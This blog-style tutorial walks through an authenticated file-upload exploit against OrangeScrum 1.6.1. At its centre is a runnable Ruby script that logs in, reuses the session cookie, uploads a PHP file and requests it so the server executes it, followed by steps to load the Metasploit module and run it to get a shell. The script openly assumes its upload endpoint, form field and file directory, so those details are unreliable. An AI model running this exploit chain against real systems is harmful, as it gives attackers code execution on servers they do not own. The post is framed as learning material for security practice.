After learning to write an exploit in Python, this time I am learning to write one as a Metasploit module. I think it is more difficult, but also more fun, and I had never coded in Ruby before (Metasploit is written in Ruby).
This exploit is the Metasploit version of my OrangeScrum 1.6.1 Python exploit, and it is also my first Metasploit module. The exploit is simple enough that it took me less than a day to learn the framework and write it. I took an existing exploit module as a template and modified it to work with this vulnerability; one of the best ways to learn code is by modifying existing code, isn't it 😀
My configuration:
- an Ubuntu machine hosting OrangeScrum 1.6.1 as the target
- Kali Linux (in VirtualBox) with Metasploit and Geany as the editor
This is how the exploit works (to learn how the vulnerability in OrangeScrum 1.6.1 works, you can read the article here).
- Log in to OrangeScrum. The login endpoint is http://yourserver/yourorangescrum/users/login, which takes a POST with the fields data[User][email], data[User][password] and submit_Pass.
- If the login succeeds, the server sets a session cookie and redirects to the dashboard; if it fails, it redirects back to the login page. The redirect target is therefore the success check.
- Upload the PHP file, sending the session cookie for authentication.
- If the upload succeeds, request the uploaded file so the server executes it.
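The following stand-alone Ruby sketch walks through the same four steps (login, reuse the session cookie, upload a PHP file, request it). It is an added example and not the module's own code: it uses Net::HTTP instead of the Metasploit HttpClient mixin so the decision helpers can be exercised offline. The login path and the three form fields are the ones named above; the upload endpoint, its form field name, the directory the uploaded file is served from, and the sample responses (including the cookie name) are assumptions and constructed data, not facts from the article.

```ruby
# Stand-alone sketch of the OrangeScrum 1.6.1 exploit flow:
# login -> reuse the session cookie -> upload a PHP file -> request it.
# Added example, not the original module; Net::HTTP stands in for the
# Metasploit HttpClient mixin so the helpers can be run offline.
require 'net/http'
require 'uri'
require 'securerandom'

module OrangescrumFlow
  LOGIN_PATH = 'users/login' # from the article
  # ASSUMPTIONS: the upload endpoint, its form field and the directory the
  # uploaded file is served from are placeholders, not confirmed by the article.
  UPLOAD_PATH  = 'users/upload_file'
  UPLOAD_FIELD = 'data[File][file]'
  UPLOAD_DIR   = 'files/'

  # Login form body with the three fields the article names.
  def self.login_form(email, password)
    URI.encode_www_form(
      'data[User][email]'    => email,
      'data[User][password]' => password,
      'submit_Pass'          => 'Login'
    )
  end

  # The article's success test: a redirect whose last path segment is
  # "dashboard" means logged in; a redirect back to users/login means failure.
  def self.login_success?(status, location)
    return false unless (300..399).cover?(status.to_i) && location
    last = location.split('?', 2).first.split('/').reject(&:empty?).last
    last == 'dashboard'
  end

  # Turn the Set-Cookie values into a Cookie header for the next requests,
  # keeping only name=value and dropping Path/HttpOnly attributes.
  def self.cookie_header(set_cookie_values)
    Array(set_cookie_values).map { |c| c.split(';', 2).first.strip }.join('; ')
  end

  # Minimal multipart/form-data body carrying one file part.
  def self.multipart(field, filename, content, boundary)
    body = +''
    body << "--#{boundary}\r\n"
    body << "Content-Disposition: form-data; name=\"#{field}\"; filename=\"#{filename}\"\r\n"
    body << "Content-Type: application/octet-stream\r\n\r\n"
    body << content << "\r\n"
    body << "--#{boundary}--\r\n"
    body
  end

  # Live run against a real target (needs network). Returns the body of the
  # final request, i.e. whatever the uploaded PHP printed.
  def self.run(base_url, email, password, php_source)
    base = URI(base_url.end_with?('/') ? base_url : "#{base_url}/")
    Net::HTTP.start(base.host, base.port, use_ssl: base.scheme == 'https') do |http|
      login = Net::HTTP::Post.new(base.path + LOGIN_PATH)
      login['Content-Type'] = 'application/x-www-form-urlencoded'
      login.body = login_form(email, password)
      res = http.request(login)
      unless login_success?(res.code, res['Location'])
        raise "login failed: #{res.code} -> #{res['Location'].inspect}"
      end
      cookie = cookie_header(res.get_fields('Set-Cookie'))

      boundary = "----#{SecureRandom.hex(8)}"
      name = "#{SecureRandom.hex(4)}.php"
      up = Net::HTTP::Post.new(base.path + UPLOAD_PATH)
      up['Cookie'] = cookie
      up['Content-Type'] = "multipart/form-data; boundary=#{boundary}"
      up.body = multipart(UPLOAD_FIELD, name, php_source, boundary)
      res = http.request(up)
      raise "upload failed: #{res.code}" unless (200..399).cover?(res.code.to_i)

      hit = Net::HTTP::Get.new(base.path + UPLOAD_DIR + name) # ASSUMPTION: served from UPLOAD_DIR
      hit['Cookie'] = cookie
      http.request(hit).body
    end
  end
end

# Constructed sample responses (not captured from a real server), used to
# exercise the decision logic offline.
SAMPLE_OK         = [302, 'http://10.0.0.5/orangescrum/dashboard']
SAMPLE_FAIL       = [302, 'http://10.0.0.5/orangescrum/users/login']
SAMPLE_SET_COOKIE = ['CAKEPHP=abc123; Path=/; HttpOnly', 'lang=en; Path=/']

if ARGV.length == 3
  # usage: ruby orangescrum_flow.rb http://target/orangescrum/ user@example.com password
  puts OrangescrumFlow.run(ARGV[0], ARGV[1], ARGV[2], '<?php echo "up"; ?>')
end
```

The important design point is the success check in `login_success?`: the module must not trust a 200 or a 302 alone, because a failed login is also a 302, only to users/login instead of the dashboard. In a real Metasploit module the same checks live in `check`/`exploit` using `send_request_cgi`, and the PHP payload would come from `payload.encoded` rather than a fixed string.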
Here are the key parts of the code.
Function for login:
Function for uploading the file:
The full code can be downloaded here.
How to install it in your Metasploit
- copy orangescrum_upload.rb into the HTTP exploit module directory; on my Kali it is /usr/share/metasploit-framework/modules/exploits/multi/http (alternatively ~/.msf4/modules/exploits/multi/http, which survives package upgrades)
- reload the module tree in msfconsole with the command reload_all
Now let's try the new exploit.
- select the exploit with use exploit/multi/http/orangescrum_upload
- set the target address (RHOST; RHOSTS on newer Metasploit versions), TARGETURI, and the USERNAME and PASSWORD of a valid OrangeScrum account
- run exploit... and we get a shell